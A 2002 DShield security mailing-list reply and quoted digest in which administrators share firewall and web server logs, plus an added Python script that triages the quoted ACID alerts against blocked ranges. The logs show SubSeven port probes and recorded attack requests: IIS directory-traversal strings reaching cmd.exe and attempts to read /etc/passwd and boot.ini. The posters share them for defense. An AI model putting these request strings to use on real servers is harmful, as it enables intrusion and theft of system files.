[Dshield] [LOGS] tcp:27374 upsurge? - ACID Incident Report (John Sage)

Grant Thurman Grant at Netprecision.Net
Tue Jul 2 16:47:01 GMT 2002


John,

Since I don't do any biz in Asia I have a number of blocks:

61.72.0.0 - 61.77.255.255 Kornet which covers:
#228-1| [2002-07-01 20:33:26] 61.77.238.139:1697 -> 12.82.132.164:27374  TCP
to 27374 SubSeven

211.200.0.0 - 211.205.255.255 which covers, HANANET >> Kornet:
#228-4| [2002-07-01 21:12:13] 211.192.184.19:3317 -> 12.82.132.164:27374
TCP to 27374 SubSeven

It's not nice to have to block such large blocks of IPs and entire
countries, but Kornet will do nothing about their hackers and spammers so I
just block them till such time as Korea and China decide to get real and
accept responsibility for their hackers.

Grant
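
An added example, not part of Grant's message or of the ACID report: it converts the two address ranges above to CIDR prefixes, collapses the quoted ACID alerts into connection attempts (same source address and port), and checks each source against the prefixes. The sample lines are alerts #228-1 to #228-13 copied from the report quoted below with wrapped lines re-joined; all function names are hypothetical.

```python
import ipaddress
import re
from datetime import datetime

# The two ranges exactly as written in the message above.
BLOCKED_RANGES = [
    ("61.72.0.0", "61.77.255.255"),
    ("211.200.0.0", "211.205.255.255"),
]

# Sample input: alerts #228-1 .. #228-13 from the quoted ACID report,
# with the mail client's line wrapping re-joined.
ACID_SAMPLE = """\
#228-1| [2002-07-01 20:33:26] 61.77.238.139:1697 -> 12.82.132.164:27374  TCP to 27374 SubSeven
#228-2| [2002-07-01 20:33:29] 61.77.238.139:1697 -> 12.82.132.164:27374  TCP to 27374 SubSeven
#228-3| [2002-07-01 20:33:35] 61.77.238.139:1697 -> 12.82.132.164:27374  TCP to 27374 SubSeven
#228-4| [2002-07-01 21:12:13] 211.192.184.19:3317 -> 12.82.132.164:27374 TCP to 27374 SubSeven
#228-5| [2002-07-01 21:12:16] 211.192.184.19:3317 -> 12.82.132.164:27374 TCP to 27374 SubSeven
#228-6| [2002-07-01 21:12:22] 211.192.184.19:3317 -> 12.82.132.164:27374 TCP to 27374 SubSeven
#228-7| [2002-07-01 23:05:04] 211.222.77.162:2977 -> 12.82.132.164:27374 TCP to 27374 SubSeven
#228-8| [2002-07-01 23:05:07] 211.222.77.162:2977 -> 12.82.132.164:27374 TCP to 27374 SubSeven
#228-9| [2002-07-01 23:05:13] 211.222.77.162:2977 -> 12.82.132.164:27374 TCP to 27374 SubSeven
#228-10| [2002-07-01 23:05:24] 211.222.77.162:2977 -> 12.82.132.164:27374 TCP to 27374 SubSeven
#228-11| [2002-07-01 23:17:02] 211.204.249.151:1905 -> 12.82.132.164:27374 TCP to 27374 SubSeven
#228-12| [2002-07-01 23:17:05] 211.204.249.151:1905 -> 12.82.132.164:27374 TCP to 27374 SubSeven
#228-13| [2002-07-01 23:17:10] 211.204.249.151:1905 -> 12.82.132.164:27374 TCP to 27374 SubSeven
"""

ALERT_RE = re.compile(
    r"\[(?P<ts>[\d-]+ [\d:]+)\]\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)"
)


def range_to_cidrs(first, last):
    """Smallest list of CIDR prefixes that covers first..last exactly."""
    return list(ipaddress.summarize_address_range(
        ipaddress.ip_address(first), ipaddress.ip_address(last)))


def parse_alerts(text):
    """Return (timestamp, src, sport, dst, dport) for every alert line."""
    alerts = []
    for line in text.splitlines():
        m = ALERT_RE.search(line)
        if m:
            alerts.append((
                datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
                m["src"], int(m["sport"]), m["dst"], int(m["dport"]),
            ))
    return alerts


def triage(text, ranges):
    """One row per connection attempt: alert count, gaps, covering prefix."""
    nets = [n for first, last in ranges for n in range_to_cidrs(first, last)]
    flows = {}  # dict preserves first-seen order
    for ts, src, sport, dst, dport in parse_alerts(text):
        flows.setdefault((src, sport, dst, dport), []).append(ts)

    rows = []
    for (src, sport, dst, dport), stamps in flows.items():
        stamps.sort()
        # Alerts from one source port a few seconds apart are consistent
        # with retries of a single connection attempt (an interpretation,
        # not something the report states).
        gaps = [int((b - a).total_seconds())
                for a, b in zip(stamps, stamps[1:])]
        hit = next((n for n in nets if ipaddress.ip_address(src) in n), None)
        rows.append({
            "src": src,
            "dport": dport,
            "alerts": len(stamps),
            "gaps": gaps,
            "blocked_by": str(hit) if hit else None,
        })
    return rows


if __name__ == "__main__":
    for first, last in BLOCKED_RANGES:
        print(first, "-", last, "=>", [str(n) for n in range_to_cidrs(first, last)])
    for row in triage(ACID_SAMPLE, BLOCKED_RANGES):
        print(row)
```

Counting rows rather than alert lines gives the number of distinct connection attempts, and a `blocked_by` of `None` marks a source that neither range would stop.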

-----Original Message-----
From: list-admin at dshield.org [mailto:list-admin at dshield.org]On Behalf Of
list-request at dshield.org
Sent: Tuesday, July 02, 2002 7:37 AM
To: list at dshield.org
Subject: Dshield digest, Vol 1 #682 - 6 msgs



Today's Topics:

   1. [LOGS] tcp:27374 upsurge? - ACID Incident Report (John Sage)
   2. Re: Anyone else?? (TranceDylan)
   3. Web server attempt (Sue Young)
   4. RE: GET /invalidfilename.htm (James C. Slora, Jr.)
   5. What is this? (Antti Tolamo)
   6. RE: GET /invalidfilename.htm??? (Russell Washington)

--__--__--

Message: 1
Date: Tue, 2 Jul 2002 05:58:52 -0700
From: John Sage <jsage at finchhaven.com>
To: list at dshield.org, intrusions at incidents.org
Subject: [Dshield] [LOGS] tcp:27374 upsurge? - ACID Incident Report
Reply-To: list at dshield.org

When looking back over the last week's records, nothing for tcp:27374
until yesterday, and then quite a few...

----- Forwarded message from ACID Alert <acid at finchhaven.com> -----

Date: Tue, 2 Jul 2002 05:52:02 -0700
Subject: ACID Incident Report
From: ACID Alert <acid at finchhaven.com>
Generated by ACID v0.9.6b21 on Tue July 02, 2002 05:52:02

For the period 06/24/02 to 07/02/02:

#228-1| [2002-07-01 20:33:26] 61.77.238.139:1697 -> 12.82.132.164:27374  TCP
to 27374 SubSeven
#228-2| [2002-07-01 20:33:29] 61.77.238.139:1697 -> 12.82.132.164:27374  TCP
to 27374 SubSeven
#228-3| [2002-07-01 20:33:35] 61.77.238.139:1697 -> 12.82.132.164:27374  TCP
to 27374 SubSeven

#228-4| [2002-07-01 21:12:13] 211.192.184.19:3317 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-5| [2002-07-01 21:12:16] 211.192.184.19:3317 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-6| [2002-07-01 21:12:22] 211.192.184.19:3317 -> 12.82.132.164:27374
TCP to 27374 SubSeven

#228-7| [2002-07-01 23:05:04] 211.222.77.162:2977 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-8| [2002-07-01 23:05:07] 211.222.77.162:2977 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-9| [2002-07-01 23:05:13] 211.222.77.162:2977 -> 12.82.132.164:27374
TCP to 27374 SubSeven

#228-10| [2002-07-01 23:05:24] 211.222.77.162:2977 -> 12.82.132.164:27374
TCP to 27374 SubSeven

#228-11| [2002-07-01 23:17:02] 211.204.249.151:1905 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-12| [2002-07-01 23:17:05] 211.204.249.151:1905 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-13| [2002-07-01 23:17:10] 211.204.249.151:1905 -> 12.82.132.164:27374
TCP to 27374 SubSeven

#228-14| [2002-07-01 23:21:27] 210.223.29.22:3966 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-15| [2002-07-01 23:21:30] 210.223.29.22:3966 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-16| [2002-07-01 23:21:36] 210.223.29.22:3966 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-17| [2002-07-01 23:21:48] 210.223.29.22:3966 -> 12.82.132.164:27374
TCP to 27374 SubSeven

#228-18| [2002-07-02 00:07:40] 210.217.170.168:4182 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-19| [2002-07-02 00:07:43] 210.217.170.168:4182 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-20| [2002-07-02 00:07:49] 210.217.170.168:4182 -> 12.82.132.164:27374
TCP to 27374 SubSeven

#228-21| [2002-07-02 00:10:31] 61.248.12.240:2559 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-22| [2002-07-02 00:10:34] 61.248.12.240:2559 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-23| [2002-07-02 00:10:40] 61.248.12.240:2559 -> 12.82.132.164:27374
TCP to 27374 SubSeven

#228-27| [2002-07-02 01:04:05] 211.55.75.66:1522 -> 12.82.132.164:27374  TCP
to 27374 SubSeven
#228-28| [2002-07-02 01:04:08] 211.55.75.66:1522 -> 12.82.132.164:27374  TCP
to 27374 SubSeven
#228-29| [2002-07-02 01:04:14] 211.55.75.66:1522 -> 12.82.132.164:27374  TCP
to 27374 SubSeven

----- End forwarded message -----


- John
--
"You are in a little maze of twisty passages, all different."

PGP key      http://www.finchhaven.com/pages/gpg_pubkey.html
Fingerprint  FE 97 0C 57 08 43 F3 EB 49 A1 0C D0 8E 0C D0 BE C8 38 CC B5


--__--__--

Message: 2
From: "TranceDylan" <trancedylan at blueyonder.co.uk>
To: <list at dshield.org>
Subject: Re: [Dshield] Anyone else??
Date: Tue, 2 Jul 2002 15:31:50 +0100
Reply-To: list at dshield.org

Hi,
It's just a shot in the dark, but have you ruled out someone on the network
attaching to "windows update" and then quitting the conn b4 the update has
completed?
tD


----- Original Message -----
From: "Erik J. Varney" <erik at centralsecurity.net>
To: "DShield Mailing List" <list at dshield.org>
Sent: Tuesday, July 02, 2002 1:39 PM
Subject: [Dshield] Anyone else??


> Is anyone else seeing continuous (non-stop) traffic from 207.46.138.20, it
> is hitting our network block and looking for port 80?
>
> Microsoft (NETBLK-MICROSOFT-GLOBAL-NET)
>    One Redmond Way
>    Redmond, WA 98052
>    US
>
>    Netname: MICROSOFT-GLOBAL-NET
>    Netblock: 207.46.0.0 - 207.46.255.255
>
>    Coordinator:
>       Microsoft  (ZM39-ARIN)  noc at microsoft.com
>       425-936-4200
>
>    Domain System inverse mapping provided by:
>
>    DNS1.CP.MSFT.NET 207.46.138.20
>    DNS2.CP.MSFT.NET 207.46.138.21
>    DNS1.TK.MSFT.NET 207.46.232.37
>    DNS1.DC.MSFT.NET 207.68.128.151
>    DNS1.SJ.MSFT.NET 207.46.97.11
>
>    Record last updated on 20-Jun-2001.
>    Database last updated on  1-Jul-2002 20:10:52 EDT.
>
>
> Erik
>
>


--__--__--

Message: 3
From: Sue Young <smy at gcmlp.com>
To: "'list at dshield.org'" <list at dshield.org>
Date: Tue, 2 Jul 2002 09:42:56 -0500
Subject: [Dshield] Web server attempt
Reply-To: list at dshield.org

This is the first time I've ever gotten hit from El Salvador -  This guy is
still hitting my web server today.  This is just a sample:

2002-07-01 22:39:02 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe
/c+dir 404 -
2002-07-01 22:39:11 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe
/c+dir 404 -
2002-07-01 22:39:13 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:15 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:18 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:23 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-07-01 22:39:25 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:30 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 500 -
2002-07-01 22:39:35 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:37 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:39 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:44 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:47 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:49 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:54 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:56 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 23:11:16 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe
/c+dir 404 -
2002-07-01 23:11:22 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe
/c+dir 404 -
2002-07-01 23:11:27 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 23:11:30 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 23:11:36 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 23:11:41 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-07-01 23:11:43 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404

Telefonica El Salvador (NETBLK-UU-63-81-36)
   65 Avenida Norte # 163
   Colonia Escalon, San Salvador SLV
   SV

   Netname: UU-63-81-36
   Netblock: 63.81.36.0 - 63.81.39.255
   Maintainer: TDES

   Coordinator:
      IP TELCA, NOC Red  (SD176-ARIN)  noc.redip at telefonica.com.sv
      503-275-8550 (FAX) 503-275-6530


Sue Young
Grosvenor Capital Management


--__--__--

Message: 4
From: "James C. Slora, Jr." <Jim.Slora at phra.com>
To: <list at dshield.org>, <pmarsh at nmefdn.org>
Date: Tue, 2 Jul 2002 11:09:51 -0400
Subject: [Dshield] RE: GET /invalidfilename.htm
Reply-To: list at dshield.org

Paul Marsh wrote on Tue, 2 Jul 2002 08:52:02 -0400 :

>Has anyone else seen the following in their logs?  Sorry for the lengthy log
>snippet but it's two attacks.

> 2002-07-01 14:58:07 217.82.44.2 - GET /invalidfilename.htm - 404 604 59 0 80
<snip>

I have gotten a couple of these lengthy HTTP vulnerability scans, but not in
the past few days. NESSUS (from www.nessus.org) was the product probably
used against my systems. These big loud scans have usually been from hosts
that have not scanned others (at least DShield has listed them as "clean").
The people who scanned me pinged each network host then scanned all live
hosts after waiting a few hours.

A NESSUS scan would most likely be a recon effort. The attacker would look
at the results of the scan, and decide whether the results indicate that
vulnerabilities exist. This might be followed by an exploit attempt later.
Or it could just be someone playing with NESSUS or some other scanner for no
reason at all.

- Jim


--__--__--

Message: 5
From: Antti Tolamo <Usenet at linux.tola.org>
To: list at dshield.org
Date: Tue, 2 Jul 2002 18:25:52 +0300
Subject: [Dshield] What is this?
Reply-To: list at dshield.org

I've been getting these for at least two days, from the same source.
Somebody is going through my server's Apache document web pages.
This is only part of the files looked at.

Yes, I do have the Apache's own web pages as a default web page
on root source: What's a 'Scooter' ? A robot?


64.152.75.38 - - [02/Jul/2002:14:10:01 +0300] "GET
/doc/apache/manual/keepalive.html HTTP/1.0" 302 205 "-" "Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:14:10:01 +0300] "GET /oops.html HTTP/1.0" 200
43 "-" "Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:15:09:57 +0300] "GET
/doc/apache/manual/configuring.html.en HTTP/1.0" 200 10443 "-"
"Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:15:14:20 +0300] "GET
/doc/apache/manual/misc/known_client_problems.html HTTP/1.0" 200 15697 "-"
"Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:15:20:11 +0300] "GET
/doc/apache/manual/netware.html HTTP/1.0" 200 13407 "-" "Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:15:21:40 +0300] "GET
/doc/apache/manual/vhosts/name-based.html.ja.jis HTTP/1.0" 200 8670 "-"
"Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:15:32:05 +0300] "GET
/doc/apache/manual/programs/suexec.html HTTP/1.0" 200 1659 "-"
"Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:15:42:59 +0300] "GET
/doc/apache/manual/mod/mod_usertrack.html HTTP/1.0" 200 10573 "-"
"Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:15:48:18 +0300] "GET
/doc/apache/manual/index.html.en HTTP/1.0" 200 9349 "-" "Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:15:50:00 +0300] "GET
/doc/apache/manual/process-model.html HTTP/1.0" 200 2701 "-"
"Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:15:54:01 +0300] "GET
/doc/apache/manual/mod/mod_mmap_static.html HTTP/1.0" 200 5696 "-"
"Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:16:07:50 +0300] "GET
/doc/apache/manual/programs/httpd.html HTTP/1.0" 200 6402 "-"
"Scooter-3.2.EX"
[Tue Jul  2 16:24:57 2002] [error] [client 64.152.75.38] File does not
exist:
/usr/share/doc/apache/manual/mod/module-dict.html


--__--__--

Message: 6
From: Russell Washington <russ.washington at vaultsentry.com>
To: "'list at dshield.org'" <list at dshield.org>
Subject: RE: [Dshield] GET /invalidfilename.htm???
Date: Tue, 2 Jul 2002 08:30:34 -0700
Reply-To: list at dshield.org

It's clearly (at least to me, could be wrong) a vulnerability scan-- maybe
someone pointed Nessus at you??

-----Original Message-----
From: Paul Marsh [mailto:pmarsh at nmefdn.org]
Sent: Tuesday, July 02, 2002 5:52 AM
To: 'Dshield (E-mail)
Subject: [Dshield] GET /invalidfilename.htm???



Has anyone else seen the following in their logs?  Sorry for the lengthy log
snippet but it's two attacks.

TIA, Paul

2002-07-01 14:58:07 217.82.44.2 - GET /invalidfilename.htm - 404 604 59 0 80
- - -
2002-07-01 14:58:07 217.82.44.2 - GET /invalidfilename.cgi - 404 604 59 0 80
- - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-bin/auktion.pl 404 604 58 15 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-bin/simplestguest.cgi 404 604 65 47 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /msadc/msadcs.dll - 404 604 56 0 80 -
- -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/script/tools/newdsn.exe 404 604 63 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-winuploader.exe 404 604 59 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-bin/imagemap.exe 404 604 60 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-bin/shop.cgi 404 604 56 16 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-bin/textcounter.pl 404 604 62 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/scripts/iisadmin/ism.dll 404 604 64 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/scripts/samples/ctguestb.idc 404 604 68 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/scripts/perl.exe 404 604 56 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /msadc/samples/ - 404 604 54 0 80 - -
-
2002-07-01 14:58:50 217.82.44.2 - GET /msadc/Samples/SELECTOR/showcode.asp -
404 604 75 16 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/..%c0%af../..%c0%af../sensepost.exe 404 604 82 0 80 - - -

2002-07-01 14:58:50 217.82.44.2 - GET /etc/passwd - 404 604 83 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/scripts/default.asp%20.pl 404 604 65 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/scripts/fpcount.exe 404 604 59 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /iisadmpwd/ - 404 604 50 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /_vti_pvt/users.pwd - 404 604 58 0 80
- - -
2002-07-01 14:58:50 217.82.44.2 - GET /graphics/sml3com - 404 604 56 0 80 -
- -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-bin/..%255c..%255c/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.ex
e 404 604 126 0 80 - - -

2002-07-01 14:58:50 217.82.44.2 - GET /index.php
|=../../../../../../../../etc/passwd 404 604 87 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /index.php
|=forum/view.php&topic=../../../../../../../etc/passwd 404 604 104 0 80 - -
-

2002-07-01 14:58:51 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/..%c0%af../..%c0%af../cmd1.exe 404 604 77 0 80 - - -
2002-07-01 14:58:51 217.82.44.2 - GET /<Rejected-By-UrlScan> ~/C:/temp/\../
404 604 52 0 80 - - -
2002-07-01 14:58:51 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-bin/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604 111 0
80 - - -

2002-07-01 14:58:51 217.82.44.2 - GET /index.php
l=../../../../../../../../etc/passwd 404 604 86 16 80 - - -
2002-07-01 14:58:51 217.82.44.2 - GET /index.php
l=forum/view.php&topic=../../../../../../../etc/passwd 404 604 104 0 80 - -
-

2002-07-01 14:58:51 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/..%c0%af../..%c0%af../cmd.exe 404 604 76 0 80 - - -
2002-07-01 14:58:52 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/..\..\..\..\..\autoexec.bat 404 604 67 0 80 - - -
2002-07-01 14:58:52 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/iisadmpwd/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604 109
0 80 - - -

2002-07-01 14:58:53 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/iisadmpwd/sensepost.exe 404 604 70 15 80 - - -
2002-07-01 14:58:53 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/..\..\..\boot.ini 404 604 57 16 80 - - -
2002-07-01 14:58:53 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/_vti_bin/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604 108
0 80 - - -

2002-07-01 14:58:53 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/iisadmpwd/cmd1.exe 404 604 65 0 80 - - -
2002-07-01 14:58:53 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/../../../boot.ini 404 604 57 0 80 - - -
2002-07-01 14:58:53 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/msadc/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604 105 0
80 - - -

2002-07-01 14:58:55 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/iisadmpwd/cmd.exe 404 604 64 16 80 - - -
2002-07-01 14:58:55 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/scripts/..%255c..%255cwinnt/system32/cmd.exe 404 604 95 0 80 - - -

2002-07-01 14:58:56 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/samples/sensepost.exe 404 604 68 0 80 - - -
2002-07-01 14:58:56 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/samples/cmd1.exe 404 604 63 0 80 - - -
2002-07-01 14:58:59 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/samples/cmd.exe 404 604 62 0 80 - - -
2002-07-01 14:58:59 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-bin/sensepost.exe 404 604 68 0 80 - - -
2002-07-01 14:59:01 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-bin/cmd1.exe 404 604 63 0 80 - - -
2002-07-01 14:59:01 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-bin/cmd.exe 404 604 62 0 80 - - -
2002-07-01 14:59:02 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/vti_cnf/sensepost.exe 404 604 68 16 80 - - -
2002-07-01 14:59:06 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/vti_cnf/cmd1.exe 404 604 63 0 80 - - -
2002-07-01 14:59:06 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/vti_cnf/cmd.exe 404 604 62 0 80 - - -
2002-07-01 14:59:07 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/vti_bin/sensepost.exe 404 604 68 0 80 - - -
2002-07-01 14:59:07 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/vti_bin/cmd1.exe 404 604 63 0 80 - - -
2002-07-01 14:59:09 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/vti_bin/cmd.exe 404 604 62 0 80 - - -
2002-07-01 14:59:09 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/msadc/sensepost.exe 404 604 66 0 80 - - -
2002-07-01 14:59:10 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/msadc/cmd1.exe 404 604 61 0 80 - - -
2002-07-01 14:59:14 217.82.44.2 - GET /<Rejected-By-UrlScan> ~/msadc/cmd.exe
404 604 60 0 80 - - -
2002-07-01 14:59:14 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/scripts/sensepost.exe 404 604 68 0 80 - - -
2002-07-01 14:59:16 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/scripts/cmd1.exe 404 604 63 0 80 - - -
2002-07-01 14:59:16 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/scripts/cmd.exe 404 604 62 16 80 - - -
2002-07-01 14:59:17 217.82.44.2 - GET /<Rejected-By-UrlScan> ~/sensepost.exe
404 604 60 0 80 - - -
2002-07-01 14:59:18 217.82.44.2 - GET /<Rejected-By-UrlScan> ~/cmd1.exe 404
604 55 0 80 - - -
2002-07-01 14:59:18 217.82.44.2 - GET /<Rejected-By-UrlScan> ~/cmd.exe 404
604 54 0 80 - - -


2002-07-01 17:38:03 80.129.106.43 - GET /index.asp - 200 21849 40 703 80 - -
-
2002-07-01 17:38:34 80.129.106.43 - GET /invalidfilename.htm - 404 604 59 0
80 - - -
2002-07-01 17:38:34 80.129.106.43 - GET /invalidfilename.cgi - 404 604 59 0
80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-bin/auktion.pl 404 604 58 16 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-bin/imagemap.exe 404 604 60 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-bin/shop.cgi 404 604 56 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-bin/textcounter.pl 404 604 62 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-winuploader.exe 404 604 59 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/scripts/iisadmin/ism.dll 404 604 64 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/scripts/samples/ctguestb.idc 404 604 68 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /msadc/msadcs.dll - 404 604 56 0 80
- - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-bin/simplestguest.cgi 404 604 65 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/script/tools/newdsn.exe 404 604 63 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/scripts/perl.exe 404 604 56 16 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /msadc/samples/ - 404 604 54 0 80 -
- -
2002-07-01 17:39:17 80.129.106.43 - GET /msadc/Samples/SELECTOR/showcode.asp
- 404 604 75 16 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/..%c0%af../..%c0%af../sensepost.exe 404 604 82 0 80 - - -

2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/scripts/default.asp%20.pl 404 604 65 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /etc/passwd - 404 604 83 0 80 - - -
